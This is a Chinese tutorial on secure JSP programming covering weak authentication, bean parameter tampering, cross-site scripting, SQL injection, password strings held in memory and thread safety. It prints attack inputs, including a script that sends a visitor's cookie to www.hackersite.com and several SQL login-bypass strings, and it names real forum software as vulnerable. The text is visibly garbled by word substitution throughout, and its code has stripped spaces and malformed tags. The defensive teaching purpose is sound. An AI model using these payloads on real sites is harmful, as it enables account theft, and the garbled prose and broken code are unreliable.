JSP平安编程实例浅析
JSP平安编程实例浅析
JavaServerPage(JSP)作为建设动态网页的技术正在始终升温。JSP和ASP、PHP、工作机制不太一样。普通说来,JSP页面在执行时是编译式,而不是解释式的。初次调用JSP文件其实是执行一个编译为Servlet的过程。当阅读器向服务器申请这一个JSP文件的时分,服务器将反省自上次编译后JSP文件能否有扭转,假设没有扭转,就间接执行Servlet,而不用再重新编译,这样,效率便失去了显著提高。
今天我将和大家一同从脚本编程的角度看JSP的平安,那些诸如源码裸露类的平安隐患就不在这篇文章探讨范围之内了。写这篇文章的次要目标是给初学JSP编程的冤家们提个醒,从一末尾就要造就平安编程的看法,不要犯不该犯的谬误,避免可能避免的损失。另外,我也是初学者,如有谬误或其它意见请发帖赐教。
一、认证不严——低级失误
在溢洋论坛v1.12批改版中,
user_manager.jsp是用户治理的页面,作者知道它的敏理性,加上了一把锁:
if((session.getValue("UserName")==null)││(session.getValue("UserClass")==null)││(!session.getValue("UserClass").equals("系统治理员")))
{
response.sendRedirect("err.jsp?id=14");
return;
}
假设要查看、修正某用户的信息,就要用modifyuser_manager.jsp这个文件。治理员提交
?modifyid=51
就是查看、修正ID为51的用户的材料(治理员默许的用户ID为51)。然而,如此重要的文件竟缺乏认证,一般用户(包括游客)也间接提交上述申请也可能对其一览有余(明码也是明文存储、显示的)。modifyuser_manage.jsp异样是门户大开,直到恶意用户把数据更新的操作执行终了,重定向到user_manager.jsp的时分,他才会看见那个姗姗来迟的显示谬误的页面。显然,只锁一扇门是远远不够的,编程的时分肯定要诲人不倦地为每一个该加身份认证的中央加下身份认证。
二、守好JavaBean的入口
JSP组件技术的外围是被称为bean的java组件。在程序中可把逻辑控制、数据库操作放在javabeans组件中,然后在JSP文件中调用它,这样可添加程序的明晰度及程序的可重用性。和传统的ASP或PHP页面相比,JSP页面是十分繁复的,由于许多动态页面解决过程可能封装到JavaBean中。
要扭转JavaBean属性,要用到“<jsp:setProperty>;”标记。
下面的代码是假想的某电子购物系统的源码的一局部,这个文件是用来显示用户的购物框中的信息的,而checkout.jsp是用来结帐的。
<jsp:useBeanid="myBasket"class="BasketBean">;
<jsp:setPropertyname="myBasket"property="*"/>;
<jsp:useBean>;
<html>;
<head>;<title>;YourBasket</title>;</head>;
<body>;
<p>;
Youhaveaddedtheitem
<jsp::getPropertyname="myBasket"property="newItem"/>;
toyourbasket.
<br/>;
Yourtotalis$
<jsp::getPropertyname="myBasket"property="balance"/>;
Proceedto<ahref="checkout.jsp">;checkout</a>;
留意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是间接经过QueryString提交的全副变量的值,将存储到婚配的bean属性中。
普通,用户是这样提交申请的:
?newItem=ITEM0105342
然而不守规矩的用户呢?他们能够会提交:
?newItem=ITEM0105342&balance=0
这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击“chekout”结账的时分,费用就全免了。
这与PHP中全局变量导致的平安成绩截然不同。由此可见:“property="*"”肯定要慎用!
三、长盛不衰的跨站脚本
跨站脚本(CrossSiteScripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的JavaScript,VBScript,ActiveX,HTML,或Flash等脚本,窃取阅读此页面的用户的隐衷,扭转用户的设置,破坏用户的数据。跨站脚本攻击在少数情况下不会对服务器和WEB程序的运转形成影响,但对客户端的平安造成重大的要挟。
以仿动网的阿菜论坛(beta-1)举个最简略的例子。当咱们提交
?name=someuser<;script>;alert(document.cookie)</script>;
便能弹出蕴含本人cookie信息的对话框。而提交
?name=someuser<;script>;document.location='http://www.163.com/'</script>;
就能重定向到网易。
因为在前往“name”变量的值给客户端时,脚本没有停止任何编码或过滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代码在用户阅读器上执行,能够导致用户隐衷泄露等结果。比如下面的链接:
?name=someuser<;script>;
document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie
</script>;
xxx.xxx用于搜集后边跟的参数,而这里参数指定的是document.cookie,也就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技术练得出神入化了。在JSP里,读取cookie也不是难事。当然,跨站脚本素来就不会局限于偷cookie这一项性能,相信大家都有肯定了解,这里就不开展了。
对一切动态页面的输入和输出都应停止编码,可能在很大水平上避免跨站脚本的攻击。遗憾的是,对一切不可信数据编码是资源密集型的工作,会对Web服务器产生功能方面的影响。常用的手腕还是停止输入数据的过滤,比如下面的代码就把风险的字符停止交流:
<%Stringmessage=request.getParameter("message");
message=message.replace('<','_');
message=message.replace('>;','_');
message=message.replace('"','_');
message=message.replace('\'','_');
message=message.replace('%','_');
message=message.replace(';','_');
message=message.replace('(','_');
message=message.replace(')','_');
message=message.replace('&','_');
message=message.replace('+','_');%>;
更踊跃的模式是应用正则表达式只容许输入指定的字符:
publicbooleanisValidInput(Stringstr)
{
if(str.matches("[a-z0-9]+"))returntrue;
elsereturnfalse;
}
四、时辰牢记SQL注入
普通的编程书籍在教初学者的时分都不留意让他们从入门时就造就平安编程的习气。著名的《JSP编程思维与实际》就是这样向初学者示范编写带数据库的登录系统的(数据库为MySQL):
Statementstmt=conn.createStatement();
StringcheckUser="select*fromloginwhereusername='"+userName+"'anduserpassword='"+userPassword+"'";
ResultSetrs=stmt.executeQuery(checkUser);
if(rs.next())
response.sendRedirect("SuccessLogin.jsp");
else
response.sendRedirect("FailureLogin.jsp");
这样使得尽信书的人长期利用这样后天“带洞”的登录代码。假设数据库里存在一个名叫“jack”的用户,那么在不知道明码的情况下至少有下面几种方法可能登录:
用户名:jack
明码:'or'a'='a
用户名:jack
明码:'or1=1/*
用户名:jack'or1=1/*
明码:(恣意)
lybbs(凌云论坛)ver2.9.Server在LogInOut.java中是这样对登录提交的数据停止反省的:
if(s.equals("")││s1.equals(""))
thrownewUserException("用户名或明码不能空。");
if(s.indexOf("'")!=-1││s.indexOf("\"")!=-1││s.indexOf(",")!=-1││s.indexOf("\\")!=-1)
thrownewUserException("用户名不能包括'\"\\,等非法字符。");
if(s1.indexOf("'")!=-1││s1.indexOf("\"")!=-1││s1.indexOf("*")!=-1││s1.indexOf("\\")!=-1)
thrownewUserException("明码不能包括'\"\\*等非法字符。");
if(s.startsWith("")││s1.startsWith(""))
thrownewUserException("用户名或明码中不能用空格。");
然而我不清楚为什么他只对明码而不对用户名过滤星号。另外,正斜杠似乎也应该被列到“黑名单”中。我还是以为用正则表达式只容许输入指定范围内的字符来得罗唆。
这里要提示一句:不要认为可能仰仗某些数据库系统天生的“平安性”就可能有效地抵御一切的攻击。pinkeyes的那篇《PHP注入实例》就给那些依赖PHP的配置文件中的“magic_quotes_gpc=On”的人上了一课。
五、String对象带来的隐患
Java平台确实使平安编程愈加方便了。Java中无指针,这象征着Java程序不再像C那样能对地址空间中的恣意内存地位寻址了。在JSP文件被编译成.class文件时会被反省平安性成绩,例如当访问超出数组大小的数组元素的尝试将被拒绝,这在很大水平上避免了缓冲区溢出攻击。然而,String对象却会给咱们带来一些平安上的隐患。假设明码是存储在JavaString对象中的,则直到对它停止渣滓搜集或进程终止之前,明码会不断驻留在内存中。即使停止了渣滓搜集,它仍会存在于空闲内存堆中,直到重用该内存空间为止。明码String在内存中驻留得越久,受到窃听的风险性就越大。更糟的是,假设实践内存缩小,则操作系统会将这个明码String换页调度到磁盘的替换空间,因此容易遭受磁盘块窃听攻击。为了将这种泄密的能够性降至最低(但不是消弭),您应该将明码存储在char数组中,并在利用后对其置零(String是不可变的,无奈对其置零)。
六、线程平安初探
“JAVA能做的,JSP就能做”。与ASP、PHP等脚本言语不一样,JSP默许是以多线程模式执行的。以多线程模式执行可大大升高对系统的资源须要,提高系统的并发量及呼应工夫。线程在程序中是独立的、并发的执行门路,每个线程有它本人的堆栈、本人的程序计数器和本人的部分变量。只管多线程运用程序中的大少数操作都可能并前停止,但也有某些操作(如更新全局标志或解决共享文件)不能并前停止。假设没做好线程的同步,在大并发量访问时,不需求恶意用户的“热心参与”,成绩也会出现。最简略的处理计划就是在相干的JSP文件中加上:<%@pageisThreadSafe="false"%>;指令,使它以单线程模式执行,这时,一切客户端的申请以串行模式执行。这样会重大升高系统的功能。咱们可能仍让JSP文件以多线程模式执行,经过对函数上锁来对线程停止同步。一个函数加上synchronized要害字就获得了一个锁。看下面的示例:
publicclassMyClass{
inta;
publicInit(){//此方法可能多个线程同时调用
a=0;
}
publicsynchronizedvoidSet(){//两个线程不能同时调用此方法
if(a>;5){
a=a-5;
}
}
}
然而这样仍然会对系统的功能有肯定影响。一个更好的计划是采用部分变量代替实例变量。由于实例变量是在堆中分配的,被属于该实例的一切线程共享,不是线程平安的,而部分变量在堆栈中分配,由于每个线程都有它本人的堆栈空间,所以这样线程就是平安的了。比如凌云论坛中减少好友的代码:
publicvoidaddFriend(inti,Strings,Strings1)
throwsDBConnectException
{
try
{
if……
else
{
DBConnectdbconnect=newDBConnect("insertintofriend(authorid,friendname)values(?,?)");
dbconnect.setInt(1,i);
dbconnect.setString(2,s);
dbconnect.executeUpdate();
dbconnect.close();
dbconnect=null;
}
}
catch(Exceptionexception)
{
thrownewDBConnectException(exception.getMessage());
}
}
下面是调用:
friendName=ParameterUtils.getString(request,"friendname");
if(action.equals("adduser")){
forumFriend.addFriend(Integer.parseInt(cookieID),friendName,cookieName);
errorInfo=forumFriend.getErrorInfo();
}
假设采用的是实例变量,那么该实例变量属于该实例的一切线程共享,就有能够出现用户A传递了某个参数后他的线程转为睡眠形状,而参数被用户B有意间修正,形成好友错配的现象。
